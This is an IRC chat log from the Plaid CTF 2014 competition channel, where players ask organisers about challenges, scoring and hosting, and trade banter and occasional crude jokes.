  8525. (11:37:57) (+frozencemetery) tokki: this is I believe the third
  8526. (11:38:02) (stypr) on that little pony
  8527. (11:38:03) (Xteven) ricky: ok
  8528. (11:38:05) (tokki) ooh
  8529. (11:38:18) ••• qUit: (wonder-defbra) ([email protected]) Quit: WeeChat 0.4.3
  8530. (11:38:33) ••• jOin: (wonder-defbra) ([email protected])
  8531. (11:38:37) ••• qUit: (rvpersie) ([email protected]) Remote host closed the connection
  8532. (11:39:28) ••• jOin: (Dr_Dinosaur) ([email protected])
  8533. (11:39:35) ••• qUit: (pcc7) (c0518434@gateway/web/freenode/ip.192.81.132.52) Ping timeout: 240 seconds
  8534. (11:39:43) ••• qUit: (ronbarrey) ([email protected]) Quit: Yaaic - Yet another Android IRC client - http://www.yaaic.org
  8535. (11:39:45) ••• jOin: (Sliden) ([email protected])
  8536. (11:40:20) ••• jOin: (ronbarrey) ([email protected])
  8537. (11:40:58) (Ymgve) seems you overestimated people's love for blackberry
  8538. (11:41:00) (houqp_) piroko: 10 hours!? have you found any bug in it?
  8539. (11:41:09) (Ymgve) not even one 100pts
  8540. (11:41:18) ••• jOin: (rvpersie) ([email protected])
  8541. (11:41:27) (n00bz) none on pwn100?
  8542. (11:41:33) (iZsh) yeah i dont get the blackberry thing at all
  8543. (11:41:43) (iZsh) only 100pt for first stage but i dont understand wtf :)
  8544. (11:42:48) ••• jOin: (thedoctordmc_) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186)
  8545. (11:43:06) (+mserrano) iZsh: Stage 1 is 250pts
  8546. (11:43:27) (iZsh) oh yeah, that's the opposite
  8547. (11:43:38) (+mserrano) yeah it's sorted by points it looks lik
  8548. (11:43:38) (+mserrano) ev0v
  8549. (11:43:40) (+mserrano) like*
  8550. (11:43:45) ••• qUit: (Dr_Dinosaur) ([email protected]) Ping timeout: 245 seconds
  8551. (11:44:09) ••• jOin: (eZpl0it) ([email protected])
  8552. (11:44:50) (chrissing) anyone i can pm aboutkappa?
  8553. (11:45:00) (+tylerni7) chrissing: dickoff
  8554. (11:45:06) ••• qUit: (tokki) (d9a5709e@gateway/web/freenode/ip.217.165.112.158) Ping timeout: 240 seconds
  8555. (11:45:09) (chrissing) wow thats mean...
  8556. (11:45:12) (+tylerni7) -_-
  8557. (11:45:14) (chrissing) sorry for asking
  8558. (11:45:18) (+tylerni7) chrissing: message dickoff
  8559. (11:45:20) ••• qUit: (poppopret) ([email protected]) Remote host closed the connection
  8560. (11:45:22) (chrissing) ohhhhh
  8561. (11:45:23) (+dickoff) chrissing: lol it's me
  8562. (11:45:26) ([pwn]TM) rofl
  8563. (11:45:27) (asmoday) haha
  8564. (11:45:29) (+tylerni7) -_______-
  8565. (11:45:33) (asmoday) them nicknames though
  8566. (11:45:36) ••• qUit: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Ping timeout: 240 seconds
  8567. (11:45:50) (+tylerni7) it's his name -_-
  8568. (11:45:53) (+dickoff) them lastnames though
  8569. (11:45:57) (+mserrano) lol
  8570. (11:46:07) (houqp_) best irc name
  8571. (11:46:42) (stypr) I don't feel like participating now
  8572. (11:47:00) (stypr) my brain is flowing at the ponyland
  8573. (11:47:01) (+mserrano) D:
  8574. (11:47:11) (stypr) pony pony pony.. dat captcha
  8575. (11:47:54) (DonnchaC) Could I PM someone about rendevous?
  8576. (11:48:09) (houqp_) DonnchaC: me
  8577. (11:48:25) ••• jOin: (poppopret) ([email protected])
  8578. (11:48:33) (+frozencemetery) (houqp is legit)
  8579. (11:49:04) (tomcr00se) stypr: i'm so happy i watched that show now
  8580. (11:49:08) ••• mOde: (ChanServ) sets (+v houqp_)
  8581. (11:49:22) ••• jOin: (bot_) (8d644bcc@gateway/web/freenode/ip.141.100.75.204)
  8582. (11:49:22) (stypr) tomcr00se: lol wat
  8583. (11:49:28) (tomcr00se) my little pony
  8584. (11:49:31) (tomcr00se) i know all the ponies
  8585. (11:49:38) (Hertz) roflmao
  8586. (11:49:40) (stypr) one of my friends used to watch that
  8587. (11:49:45) ••• nIck: (bot_) is now known as (Guest68736)
  8588. (11:50:06) (Guest68736) who can I pm for halphow2js
  8589. (11:50:12) (stypr) she always talked about pony and I never thought of it coming as a challenge
  8590. (11:50:18) (tomcr00se) also this ctf is really competitive
  8591. (11:50:45) ••• jOin: (tokki) (d9a5709e@gateway/web/freenode/ip.217.165.112.158)
  8592. (11:50:48) ••• qUit: (rvpersie) ([email protected]) Remote host closed the connection
  8593. (11:50:51) (tokki) fak my chrome must hate me
  8594. (11:51:27) (Guest68736) can I someone pm for the halphow2j challenge?
  8595. (11:51:32) (+dickoff) tomcr00se: we're really happy with how much competition there's been for the top spots, always makes it more fun to watch :)
  8596. (11:51:53) ••• pArt: (f00b4r_) ([email protected])
  8597. (11:52:03) ••• jOin: (f00b4r_) ([email protected])
  8598. (11:52:04) ••• pArt: (f00b4r_) ([email protected])
  8599. (11:52:08) ••• qUit: (Guest1734) ([email protected]) Quit: Leaving...
  8600. (11:52:10) (wtbw) and hey, it's a CTF that won't be won by PPP for once!
  8601. (11:52:12) (poppopret) can I pm someone for doge_stege
  8602. (11:52:13) ••• jOin: (f00b4r_) ([email protected])
  8603. (11:52:14) ••• jOin: (lukasz_) (~chatzilla@2607:5300:100::f7)
  8604. (11:52:49) (tomcr00se) like i have to beat leetmore to top10
  8605. (11:53:08) ••• jOin: (vos) ([email protected])
  8606. (11:53:27) (vos) morning guys
  8607. (11:53:29) (+dickoff) wtbw: hmm, now that you mention it, we do have control of the scoreboard ;)
  8608. (11:53:37) (vos) whom can i ask about bronies pt2?
  8609. (11:53:42) (+houqp_) poppopret: poke mserrano
  8610. (11:53:43) (+dickoff) vos: ricky
  8611. (11:53:45) (vos) thx
  8612. (11:54:00) (Guest68736) whom can i ask about halphow2js
  8613. (11:54:32) (+mserrano) Guest68736: pm me I guess
  8614. (11:54:34) ••• qUit: (kiwhacks) (~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128) Remote host closed the connection
  8615. (11:54:50) ••• qUit: (ronbarrey) ([email protected]) Ping timeout: 250 seconds
  8616. (11:55:40) (+mserrano) tomcr00se: :)
  8617. (11:55:56) ••• qUit: (thedoctordmc_) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Quit: Page closed
  8618. (11:56:02) ••• jOin: (rvpersie) ([email protected])
  8619. (11:56:22) ••• jOin: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186)
  8620. (11:58:40) (foundation) WHOA, I KNOW HOW TOR WORKS
  8621. (11:58:50) ••• jOin: (braoru) ([email protected])
  8622. (11:59:02) (foundation) that's how i feel when i learn something really really fast during some ctf
  8623. (11:59:26) (|x_x|) How does tor work?
  8624. (11:59:52) (Ymgve) magic
  8625. (11:59:54) (Ymgve) and magnets
  8626. (12:00:02) (|x_x|) That makes a lot of sense.
  8627. (12:00:09) (halfvollemelk) I heard it has something to do with onions
  8628. (12:00:17) (wtbw) dickoff: hah :)
  8629. (12:00:19) (PauseSave) more magnet than magic, the magic is mostly like endless hankercheifs and stuff
  8630. (12:00:23) (+frozencemetery) garlic: the other onion router
  8631. (12:00:35) (halfvollemelk) bronions
  8632. (12:00:45) (+frozencemetery) yesss
  8633. (12:01:14) ••• jOin: (bool_101) ([email protected])
  8634. (12:01:34) (halfvollemelk) tips for doge_stege? xD
  8635. (12:01:40) (tokki) much doge!
  8636. (12:02:12) ••• qUit: (bool101) (~bool@unaffiliated/bool101) Ping timeout: 250 seconds
  8637. (12:04:07) (_joeje_) PPP: any arm binaries this comp?
  8638. (12:04:36) ••• qUit: ([SF]testdata) (75d9b8dc@gateway/web/freenode/ip.117.217.184.220) Ping timeout: 240 seconds
  8639. (12:06:02) (+dickoff) _joeje_: nope
  8640. (12:06:08) (+frozencemetery) lolarm
  8641. (12:06:32) (foundation) sadness
  8642. (12:06:56) • _joeje_ throws rasppi on the floor
  8643. (12:07:26) (foundation) noooo, save it for defcon quals
  8644. (12:07:32) (+frozencemetery) _joeje_: http://stream1.gifsoup.com/view1/1516381/happy-birthday-to-the-ground-o.gif ?
  8645. (12:08:01) ••• jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
  8646. (12:08:20) (foundation) unless legitbs found a cheap stash of wii's and make this year the year of ppc
  8647. (12:08:22) ••• qUit: (Bono) (1b7f597e@gateway/web/freenode/ip.27.127.89.126) Quit: Page closed
  8648. (12:11:06) ••• qUit: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55) Ping timeout: 240 seconds
  8649. (12:11:29) ••• pArt: (lukasz_) (~chatzilla@2607:5300:100::f7)
  8650. (12:13:25) (Valodim) bronies broken?
  8651. (12:14:23) ••• nIck: (namrog) is now known as (namrog84)
  8652. (12:15:35) (+ricky) poppopret: Looking now, was grabbing lunch
  8653. (12:15:55) (Valodim) (bronies fixed)
  8654. (12:16:00) (+ricky) Cool
  8655. (12:16:11) (+ricky) poppopret: Sorry, that wasn't to you at all, hehe
  8656. (12:16:20) ••• jOin: (kanghee) ([email protected])
  8657. (12:16:36) (poppopret) lol yea i was confused
  8658. (12:16:45) (morla) gnahh
  8659. (12:17:03) (morla) i think i killed halphow2js
  8660. (12:17:05) (morla) sorry :(
  8661. (12:17:06) ••• qUit: (Fireghost) ([email protected]) Read error: Connection reset by peer
  8662. (12:17:13) (morla) if i did...
  8663. (12:17:14) ••• jOin: (Fireghost) ([email protected])
  8664. (12:17:17) ••• jOin: (someone__) (d1cb4e22@gateway/web/freenode/ip.209.203.78.34)
  8665. (12:17:24) ••• jOin: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55)
  8666. (12:17:37) ••• jOin: (d248) ([email protected])
  8667. (12:18:44) (dwn) hey
  8668. (12:18:47) (dwn) UPDATE2: Also, bronies is not intended to be solved via client side (e.g. webkit) exploits - if you manage to do so though, that's fair game.
  8669. (12:18:53) (dwn) by "exploits"
  8670. (12:18:57) ••• jOin: (makler2004) ([email protected])
  8671. (12:19:12) (dwn) I mean
  8672. (12:19:31) (+ricky) dwn: By exploits I mean memory corruption/webkit bugs
  8673. (12:19:38) (+awesie) dwn: that means like pwn2own/pwnium 0days :)
  8674. (12:19:49) (dwn) ok because yeah I figured there wasn't another way than what I was thinking
  8675. (12:21:36) ••• qUit: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55) Ping timeout: 240 seconds
  8676. (12:21:56) ••• qUit: (silesm) ([email protected]) Quit: WeeChat 0.4.2
  8677. (12:22:05) ••• qUit: (hoge) ([email protected]) Quit: Leaving...
  8678. (12:22:51) ••• jOin: (areke) ([email protected])
  8679. (12:22:57) (dwn) also anyone manage to get some challenge that happens to require libseccomp running on kali
  8680. (12:23:34) ••• jOin: (j0f`) (~j0f@unaffiliated/j0f)
  8681. (12:24:53) ••• qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Quit: leaving
  8682. (12:25:05) (sdfsfdsfd) sdasd
  8683. (12:25:05) (morla) ricky, awesie: could you check halphow2js, i might have busted it :(
  8684. (12:25:18) ••• jOin: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55)
  8685. (12:25:23) ••• jOin: (nofiki1) ([email protected])
  8686. (12:25:29) (morla) wont happen again ://
  8687. (12:25:34) (morla) i hope lol
  8688. (12:26:23) (areke) what time does this end?
  8689. (12:26:35) ••• qUit: (f00b4r_) ([email protected]) Quit: f00b4r_
  8690. (12:26:38) ••• jOin: (T1mb0) ([email protected])
  8691. (12:26:39) (someone__) any hints for formatting the flag on multiplication is hard
  8692. (12:26:48) ••• qUit: (nolze) ([email protected]) Remote host closed the connection
  8693. (12:26:57) ••• qUit: (j0f`) (~j0f@unaffiliated/j0f) Client Quit
  8694. (12:27:11) (ryan-c) someone__: it's a series of digits
  8695. (12:27:15) ••• jOin: (deject3d_) ([email protected])
  8696. (12:28:03) (+awesie) areke: ends at 5pm EDT
  8697. (12:28:24) (|x_x|) So roughly 3.5 hours?
  8698. (12:28:30) (areke) thanks
  8699. (12:28:38) (+awesie) |x_x|: correct
  8700. (12:28:46) (|x_x|) Dankeshe
  8701. (12:28:54) (lavish) someone__: once you get it you'll understand
  8702. (12:29:05) ••• qUit: (areke) ([email protected]) Quit: areke
  8703. (12:29:08) ••• jOin: (nolze) ([email protected])
  8704. (12:29:51) (+awesie) morla: i restarted halphow2js, should be working now?
  8705. (12:30:35) ••• qUit: (deject3d) ([email protected]) Ping timeout: 258 seconds
  8706. (12:31:37) (tokki) is there any tenement hint?
  8707. (12:31:43) • tokki blinks eyes
  8708. (12:31:53) • tokki makes the "cute" face
  8709. (12:32:01) • tokki stares at admins
  8710. (12:32:14) • tokki *blink**blink*
  8711. (12:32:48) (dwn) the webs are easier than tenement and worth more yo
  8712. (12:32:49) (geobot) is there any tenement hint?
  8713. (12:33:11) (dwn) ppp has revealed their love for webchalls
  8714. (12:33:11) (geobot) yeah ucsd revealed that the worst
  8715. (12:33:20) (dwn) geobot now triggers on every line I say
  8716. (12:33:37) (Adran) lol
  8717. (12:33:57) (+cai_) grats MSLC for getting part 1 of bbos :)
  8718. (12:34:50) (+frozencemetery) geobot: no, no tenement hint for you
  8719. (12:34:59) ••• jOin: (hammerpig) (~user@gateway/tor-sasl/hammerpig)
  8720. (12:35:03) (tokki) and me +_+?
  8721. (12:35:13) • tokki has freaking shiny eyes
  8722. (12:35:28) (+frozencemetery) D::::
  8723. (12:35:36) ••• qUit: (paul55) (b4f91af3@gateway/web/freenode/ip.180.249.26.243) Ping timeout: 240 seconds
  8724. (12:35:50) (tokki) frozencemetery: D:::::
  8725. (12:36:01) (mrsmith67) ricky: check pm's
  8726. (12:36:05) ••• qUit: (kanghee) ([email protected]) Remote host closed the connection
  8727. (12:37:00) (tokki) +_+
  8728. (12:37:08) (tokki) + _+
  8729. (12:37:12) (tokki) + _+
  8730. (12:37:21) (dwn) tokki: there's not really any way to give a hint for that challenge. like the best hint that could be given is "have you opened it in a disassembler? do you know what shellcode is?"
  8731. (12:37:23) (iZsh) scoreboard is down?
  8732. (12:37:26) (+cai_) MSLC finished bbos :) grats!
  8733. (12:37:33) (tokki) dwn: kk..
  8734. (12:37:36) (+cai_) iZsh: it's working
  8735. (12:37:44) (+cai_) try refreshing
  8736. (12:39:03) ••• jOin: (deject3d) ([email protected])
  8737. (12:39:09) (morla) awesie: yes, thanks!
  8738. (12:39:27) (+mserrano) dayum leetmore
  8739. (12:39:30) ••• jOin: (DKay) (uid11914@gateway/web/irccloud.com/x-pslnfvcgkqlkagfl)
  8740. (12:39:48) (+ricky) Key hoarding sucks :-(
  8741. (12:39:48) (geobot) it'd probably just does it :-(
  8742. (12:39:56) (+cai_) MSLC now on 3rd
  8743. (12:40:02) (DKay) awesome More Smoked Leet Chicken got 'bbos' :/
  8744. (12:40:19) (+cai_) no, the race won't work. stop trying
  8745. (12:40:27) (+mserrano) hellman: y u do dis
  8746. (12:40:33) ••• jOin: (ronbarrey) ([email protected])
  8747. (12:40:38) (tomcr00se) wtf so many solves so fast
  8748. (12:40:40) (+cai_) we'll actually deduct points if we see it again
  8749. (12:41:03) (+mserrano) tomcr00se: I suspect they actually solved all these a while ago and were just hoarding solves
  8750. (12:41:13) ••• jOin: (paul55) (b4f91af3@gateway/web/freenode/ip.180.249.26.243)
  8751. (12:41:35) (dwn) nah they just woke up ;)
  8752. (12:42:00) (Ymgve) gotta scare the top teams a bit
  8753. (12:42:11) ••• qUit: (deject3d_) ([email protected]) Ping timeout: 240 seconds
  8754. (12:42:25) (+frozencemetery) you're not as fast as THESE DATABASE CONSTRAINTS *flexes*
  8755. (12:42:27) (robbje) or giving other teams high hopes and then demoralizing them ;D
  8756. (12:42:58) (|x_x|) That's what I'd do if I weren't an idjit.
  8757. (12:43:15) (Ymgve) I feel bad for the teams that haven't solved sanity check
  8758. (12:44:14) (|x_x|) I feel bad for the teams that haven't solved multiplication is hard.
  8759. (12:44:23) ••• qUit: ([GoN]Jakkdu) ([email protected]) Ping timeout: 258 seconds
  8760. (12:44:23) (+mserrano) whoa, whoa
  8761. (12:44:25) (+mserrano) multiplication is hard man
  8762. (12:44:37) (|x_x|) Exactly!
  8763. (12:44:45) (|x_x|) Which is why I feel bad for anyone still working on it.
  8764. (12:45:23) ••• qUit: (ricky) (~ricky@fedora/ricky) Ping timeout: 240 seconds
  8765. (12:46:12) ••• jOin: (ricky) (~ricky@fedora/ricky)
  8766. (12:46:13) ••• mOde: (ChanServ) sets (+v ricky)
  8767. (12:47:17) ••• jOin: (kanghee) ([email protected])
  8768. (12:48:24) ••• jOin: (cimmi_) (1f2d47df@gateway/web/freenode/ip.31.45.71.223)
  8769. (12:49:00) (_blasty_) MSLC six flags in 20 mins ?
  8770. (12:49:00) (geobot) we were the first 30 mins ago, so everybody can just use fd redirecting stuff or will be great
  8771. (12:49:02) ••• qUit: (nofiki1) ([email protected]) Quit: Leaving.
  8772. (12:49:19) (+tylerni7) _blasty_: apparently
  8773. (12:49:27) ••• qUit: (ronbarrey) ([email protected]) Ping timeout: 250 seconds
  8774. (12:49:32) ••• qUit: (sdfsfdsfd) ([email protected])
  8775. (12:49:46) (dwn) who is 0xffa comprised of
  8776. (12:49:48) (_blasty_) j00 myt3 w4nn4 4ud1t j00r 1nfr4
  8777. (12:49:55) (_blasty_) I think there's russians in your db
  8778. (12:50:04) (+mserrano) I'm pretty sure that's no tit
  8779. (12:50:05) (+mserrano) not*
  8780. (12:50:12) (_blasty_) flag hoarding /
  8781. (12:50:12) (geobot) you are just hoarding solves
  8782. (12:50:13) (dwn) im pretty sure mslc is just good
  8783. (12:50:15) (+frozencemetery) _blasty_: but we had evil bit checking enabled and everything!
  8784. (12:50:22) (+tylerni7) geobot: you know what's up
  8785. (12:50:22) (geobot) and u breast fed, what's wrong with boobs?
  8786. (12:50:28) (dwn) ownedf
  8787. (12:50:29) (+tylerni7) wtf
  8788. (12:50:30) (+mserrano) yeah they probably flag harded
  8789. (12:50:30) (geobot) i have seen flag isn't the 195 one
  8790. (12:50:32) (+mserrano) geobot: wtf
  8791. (12:50:33) (zoku) so
  8792. (12:50:34) (+mserrano) w.t.f.
  8793. (12:50:34) (zoku) close
  8794. (12:50:35) (zoku) to
  8795. (12:50:36) (geobot) they seem to win
  8796. (12:50:36) (zoku) ez
  8797. (12:50:37) (zoku) hp
  8798. (12:50:41) (Ymgve) actually it was a wormhole
  8799. (12:50:58) (Ymgve) submitted last year but just showed up today
  8800. (12:51:25) (nopple) lol, where has geobot been hanging out lately?
  8801. (12:51:26) (geobot) (finals, quals will still don't agree that hanging out and chatting is all new portlandia episode :-o
  8802. (12:51:49) (dwn) hey ppp how do you run this ctf. like a bunch of amazon aws instances? some colo'd esxi box?
  8803. (12:51:56) (+mserrano) ec2
  8804. (12:51:56) (+dickoff) dwn: it's all on aws
  8805. (12:52:00) ••• qUit: (zoomequipd) (~zoomequip@gateway/tor-sasl/zoomequipd) Remote host closed the connection
  8806. (12:52:00) ••• qUit: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796) Read error: Connection reset by peer
  8807. (12:52:00) ••• qUit: (hammerpig) (~user@gateway/tor-sasl/hammerpig) Read error: Connection reset by peer
  8808. (12:52:24) (_joeje_) whats the ballpark server cost after all is said in done
  8809. (12:52:38) (dwn) do you use a script to set up an instance for a challenge? how do you deploy/redeploy a challenge?
  8810. (12:52:42) (+tylerni7) _joeje_: probably a few hundred
  8811. (12:52:47) ••• qUit: (n00bz) ([email protected]) Remote host closed the connection
  8812. (12:52:59) (+tylerni7) dwn: we have scripts for making instances for problems, and manually set up the challenge on it
  8813. (12:53:07) (+tylerni7) we basically just scp from our git
  8814. (12:53:25) (dwn) ah cool
  8815. (12:53:30) ••• qUit: (guy_) ([email protected]) Changing host
  8816. (12:53:31) ••• jOin: (guy_) (~guy@unaffiliated/guy/x-2189580)
  8817. (12:53:57) (+ricky) we should automate stuff nicely... eventaully
  8818. (12:54:06) ••• qUit: (paul55) (b4f91af3@gateway/web/freenode/ip.180.249.26.243) Ping timeout: 240 seconds
  8819. (12:54:11) ••• qUit: (johnCool) ([email protected]) Ping timeout: 252 seconds
  8820. (12:54:18) • +ricky continues waiting for ds to solve bronies 1
  8821. (12:54:21) (x7r0n) 6 flags in just 20 min MSLC ..wat u guys on weed.. ?? oh graph..look at it..
  8822. (12:54:27) (x7r0n) MSLC is on fire
  8823. (12:54:28) (+ricky) Other teams have a headstart on bronies 2 - better catch up :-)
  8824. (12:54:29) (x7r0n) :-D
  8825. (12:54:55) (+frozencemetery) automated deployment is complicated by some problems requiring different configurations (os, for example)
  8826. (12:55:55) (shadghost) 54.* addresses are genarly AWS servers
  8827. (12:56:00) ••• qUit: (Sin__) ([email protected]) Quit: retq
  8828. (12:56:50) (shadghost) As of January 30, 2014, the current CloudFront IP addresses are:
  8829. (12:56:50) (shadghost) 54.192.0.0/16
  8830. (12:56:50) (shadghost) 54.230.0.0/16
  8831. (12:56:50) (shadghost) 54.239.128.0/18
  8832. (12:56:50) (shadghost) 54.239.192.0/19
  8833. (12:56:52) (shadghost) 54.240.128.0/18
  8834. (12:56:55) (shadghost) 204.246.164.0/22
  8835. (12:56:57) (shadghost) 204.246.168.0/22
  8836. (12:57:00) (shadghost) 204.246.174.0/23
  8837. (12:57:02) (shadghost) 204.246.176.0/20
  8838. (12:57:05) (shadghost) 205.251.192.0/19
  8839. (12:57:07) (shadghost) 205.251.249.0/24
  8840. (12:57:10) (shadghost) 205.251.250.0/23
  8841. (12:57:12) (shadghost) 205.251.252.0/23
  8842. (12:57:15) (shadghost) 205.251.254.0/24
  8843. (12:57:17) (shadghost) 216.137.32.0/19
  8844. (12:57:20) (shadghost) (AWS ip ranges)
  8845. (12:57:34) ••• qUit: (dct1) ([email protected]) Quit: dct1
  8846. (12:57:34) ••• mOde: (ChanServ) sets (+o tylerni7)
  8847. (12:57:48) ••• jOin: (Beched) (6dbc7f17@gateway/web/freenode/ip.109.188.127.23)
  8848. (12:57:54) ••• mOde: (ChanServ) sets (-o tylerni7)
  8849. (12:58:18) (+tylerni7) shadghost: we have AWS instances not in those ranges, fwiw :P
  8850. (12:59:16) (+frozencemetery) we also have instances *not* in those ranges, tbf
  8851. (12:59:39) ••• jOin: (ronbarrey) ([email protected])
  8852. (12:59:46) (shadghost) https://forums.aws.amazon.com/ann.jspa?annID=2051
  8853. (12:59:56) (shadghost) well I was pulling from that page
  8854. (13:00:00) ••• qUit: (ggis) ([email protected]) Ping timeout: 245 seconds
  8855. (13:00:09) (iZsh) anyone for bbos?
  8856. (13:00:14) ••• qUit: (x7r0n) ([email protected]) Read error: Connection reset by peer
  8857. (13:00:22) (+tylerni7) iZsh: poke awesie
  8858. (13:00:30) (+awesie) iZsh: pm me
  8859. (13:00:58) (shadghost) err I have a instance outside thoes ranges.
  8860. (13:01:06) (tokki) awesie is awesome
  8861. (13:01:17) ••• jOin: (nofiki1) ([email protected])
  8862. (13:02:12) (shadghost) Err here it is fro EC2
  8863. (13:02:13) (shadghost) https://forums.aws.amazon.com/ann.jspa?annID=1701
  8864. (13:02:15) ••• qUit: (T1mb0) ([email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Like it? Visit #hydrairc on EFNet
  8865. (13:03:30) (dunamis) hi, anybody available for an ezhp question?
  8866. (13:03:55) (+mserrano) dunamis: pm
  8867. (13:04:08) (cychao) sorry , is freya work? it's return nothing
  8868. (13:04:39) (Xteven) is there a better explanation of parlor?
  8869. (13:04:45) ••• jOin: (frozencemetery1) ([email protected])
  8870. (13:04:48) (+tylerni7) Xteven: you can pm me if you're confused about it
  8871. (13:04:57) (+tylerni7) I can clarify the description if it's unclear
  8872. (13:05:15) (+tylerni7) .win 133
  8873. (13:05:15) ••• qUit: (morla) ([email protected]) Disconnected by services
  8874. (13:05:16) (+tylerni7) ugh
  8875. (13:05:29) ••• mOde: (ChanServ) sets (+v frozencemetery1)
  8876. (13:05:32) (ronbarrey) mserrano: any sites that would offer advice for web150?
  8877. (13:05:45) (tokki) lol my teammate is using the crypto 20 for his linux root password
  8878. (13:05:46) (geobot) and 20 times!
  8879. (13:05:51) ••• qUit: (frozencemetery) ([email protected]) Ping timeout: 258 seconds
  8880. (13:06:10) (+tylerni7) cychao: seems like it's still working though
  8881. (13:06:18) (Xteven) tylerni7: thx
  8882. (13:06:20) (+tylerni7) np
  8883. (13:06:22) (+dickoff) geobot: that's a lot!
  8884. (13:06:28) (+frozencemetery1) my poc works against freya so it's fine
  8885. (13:06:54) (_joeje_) random pwnables plx
  8886. (13:07:12) (tokki) wait frozencemetery1 i thought you just left
  8887. (13:07:37) (+frozencemetery1) tokki: the internet connection on my server is not the best
  8888. (13:07:51) ••• mOde: (ChanServ) sets (+o cai_)
  8889. (13:07:53) (+ricky) _joeje_: Why don't you look at bronies instead? You might enjoy that problem :-P
  8890. (13:07:56) (tokki) oh you have a little 1 next to your nick xp
  8891. (13:07:59) (+frozencemetery1) you would think that fios wouldn't have these problems, but I guess not
  8892. (13:08:03) (+frozencemetery1) yeah
  8893. (13:08:07) ••• tOpic: (cai_) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 3 Hours left | $30 added to each cash prizes so far (from CHANCE card))
  8894. (13:08:15) ••• mOde: (ChanServ) sets (-o cai_)
  8895. (13:08:20) ••• qUit: (Gynvael) ([email protected]) Ping timeout: 245 seconds
  8896. (13:08:27) ••• jOin: (johnCool) ([email protected])
  8897. (13:08:32) ••• jOin: (ramsexy) ([email protected])
  8898. (13:08:39) (_joeje_) ah, thought chance jumped to a random problem
  8899. (13:08:39) (cychao) frozencemetery1 tylerni7 : thank you
  8900. (13:08:47) (tokki) chance likez moniez
  8901. (13:08:50) (tokki) not hintz
  8902. (13:10:16) (+dickoff) _joeje_: nah, it'll either reveal a hint, add money to the prize pool (already maxed out at $30) or do nothing
  8903. (13:10:30) (phiber__) who can I talk about parlor crypto?
  8904. (13:10:32) (poppopret) for all the pwnables do you need to spawn a shell?
  8905. (13:10:47) (+tylerni7) phiber__: me
  8906. (13:10:53) (+ricky) Usually getting a shell is a good idea on all the pwnables
  8907. (13:11:18) (+ricky) But do whatever it takes to get the flag :-)
  8908. (13:11:19) (geobot) but the guy who takes for acez to me feel free to talk lol
  8909. (13:11:19) (+cai_) _joeje_: you get to roll one more time if you land on chance
  8910. (13:11:21) (+cai_) like now
  8911. (13:11:25) ••• jOin: (frozencemetery) ([email protected])
  8912. (13:11:26) ••• mOde: (ChanServ) sets (+v frozencemetery)
  8913. (13:11:29) ••• jOin: (copyleft_) ([email protected])
  8914. (13:11:52) ••• nIck: (bool_101) is now known as (bool101)
  8915. (13:12:02) (_joeje_) roll 6 -> 3
  8916. (13:12:15) (chrissing) i hope its web100
  8917. (13:12:33) (+cai_) you need to roll 1 to open web100 :)
  8918. (13:12:33) (geobot) web100 either
  8919. (13:12:46) (+cai_) reversing 250 is opened
  8920. (13:12:47) (geobot) opened up some from the comp that showed the correct order, so it back
  8921. (13:12:47) (+ricky) We're going to open web100 as well
  8922. (13:12:55) (_blasty_) DO NOT LAND ON CHANCE
  8923. (13:12:59) (tokki) CHANCE
  8924. (13:13:01) (_blasty_) DO NOT WORSHIP FALSE IDOLS
  8925. (13:13:02) (tokki) YES CHANCE
  8926. (13:13:03) (+cai_) lol
  8927. (13:13:10) ••• jOin: (noregret_) ([email protected])
  8928. (13:13:12) (chrissing) OK YAY
  8929. (13:13:13) (tokki) <3
  8930. (13:13:15) ••• jOin: (Gynvael) ([email protected])
  8931. (13:13:16) (+cai_) web100 is opened as well
  8932. (13:13:17) (geobot) reversing 250 is opened it was at defcon?
  8933. (13:13:53) (+ricky) If it ends up coming down to one or two points for the top two teams
  8934. (13:13:59) (+ricky) Then solving this stuff quick is imperative :-P
  8935. (13:14:04) (+ricky) </metagame>
  8936. (13:14:28) (robbje) cool, web.
  8937. (13:14:28) (geobot) cool, was just segfaulting/one of them had it backwards
  8938. (13:14:31) • robbje fires up dirbuster
  8939. (13:14:36) ••• pArt: (frozencemetery1) ([email protected]) "WeeChat 0.3.8"
  8940. (13:14:36) (+tylerni7) robbje: >:|
  8941. (13:14:40) (+ricky) Heheh
  8942. (13:14:54) (+frozencemetery) we need a picture of ricky holding a giant hammer
  8943. (13:15:05) (+tylerni7) new ctf rules: 1) don't be a dick, 2) THAT MEANS NO FUCKING DIRBUSTER
  8944. (13:15:50) (tokki) DICKS ARE AWESOME
  8945. (13:15:55) (tokki) (?)
  8946. (13:15:56) (+frozencemetery) there are 404 users in this channel that is all
  8947. (13:16:15) ••• qUit: (noregret) (~regret@unaffiliated/noregret) Ping timeout: 245 seconds
  8948. (13:16:24) (+frozencemetery) https://24.media.tumblr.com/tumblr_m0u527UeaF1roejvzo1_250.gif ^ relevant
  8949. (13:16:43) (+mserrano) DO YOU WANT AN HTML 5 THAT DOESN'T TAKE ADVANTAGE OF JUMP LISTS
  8950. (13:16:53) (tokki) lol
  8951. (13:16:59) ••• qUit: (Sliden) ([email protected]) Ping timeout: 240 seconds
  8952. (13:17:09) (+mserrano) ON WINDOWS. ONLY WINDOWS. THE OTHER PLATFORMS ARE NOT NATIVE
  8953. (13:17:46) ••• jOin: (bwn3r) ([email protected])
  8954. (13:17:46) ••• qUit: (bwn3r) ([email protected]) Changing host
  8955. (13:17:47) ••• jOin: (bwn3r) (~n00b13@unaffiliated/nitsua)
  8956. (13:18:49) (tokki) MACCC
  8957. (13:18:51) (tokki) MACCCCCC
  8958. (13:19:38) ••• qUit: (c1l0) ([email protected]) Ping timeout: 276 seconds
  8959. (13:20:27) ••• jOin: (jablonskim) ([email protected])
  8960. (13:20:58) (Hertz) what's the point of this web 100
  8961. (13:21:33) (+frozencemetery) Hertz: man, way to go all existential on us
